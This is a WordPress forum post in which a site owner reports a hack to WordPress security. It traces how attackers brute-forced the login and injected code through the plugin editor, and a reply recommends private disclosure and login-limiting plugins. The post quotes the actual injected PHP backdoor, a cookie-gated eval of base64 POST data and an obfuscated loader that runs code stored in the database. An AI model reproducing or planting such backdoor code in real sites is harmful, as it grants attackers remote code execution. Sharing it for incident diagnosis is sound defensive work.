Site hacked through Akismet

Here’s a copy of the e-mail I sent to security@wordpress, in case it helps anyone diagnose their own issues:

Hi folks, my WordPress install was recently hacked (see here for initial symptoms and another victim: http://wordpress.org/support/topic/wp-super-cache-has-broken-my-site-i-need-help-please?replies=4) and based on what I’m seeing in the logs it might be Akismet-related (maybe connected to http://wordpress.org/support/topic/site-hacked-through-akismet?replies=4?). My WordPress core is 3.1.3; Akismet and my other plugins are up-to-date as of a week or so ago.

On 3 July, the address 217.23.3.57 made about 15 POSTs to wp-login.php, followed by a number of different GET requests to wp-admin/templates.php. The templates.php requests returned 404s, but they then got a 200 for wp-admin/plugin-editor.php and sent the parameters file=akismet/akismet.php&plugin=akismet/akismet.php.

They then sent a POST to plugin-editor.php, I believe to inject the following code into akismet.php:
if(md5($_COOKIE['1258f0ce88b068e6'])=="948467a3e2a78f5fb4b4ea8934416ca9"){ eval(base64_decode($_POST['file'])); exit; }

There then followed another successful POST directly to wp-content/plugins/akismet/akismet.php, presumably to execute the above code.

While the above code only appears in akismet.php, all plugin files have now been injected with some bootstrap code that loads up a bunch of base64-encoded and obfuscated code from the database:
$z=get_option("_transient_feed_1f198b76a8c316731dd24df4a7f4fd3e"); $z=base64_decode(str_rot13($z)); if(strpos($z,"8F8995B6")!==false){ $_z=create_function("",$z); @$_z(); }

Some of the code chmods everything in the theme and plugin directories to 0777, changes the modification times of all WordPress files to Sep 5 2007, and disables and removes the error logs.

I think that at this point the attackers tripped themselves up, however, because the bootstrap code was injected into wp-cache-phase1.php from the Super Cache plugin. It seems that get_option is not defined yet when that code is executed, so WordPress started returning 500s and the attacker seems to have given up.

I haven’t been able to determine yet how they gained access in the first place, but I’m happy to supply access logs, compromised files, etc. if you’re interested.

Best regards,
Miquel

These kinds of reports should go first and only to security@wordpress.org. P

osting exploit details here won’t get the information into the right hands, and can only serve to facilitate public disclosure of the exploit, potentially allowing others to make use of it.

I’m sure Otto probably suggested this to you, but I would strongly recommend using a Plugin such as Limit Login Attempts or Login Lockdown, to prevent brute-force password attacks. (I prefer Limit Login Attempts, because it provides email notification.)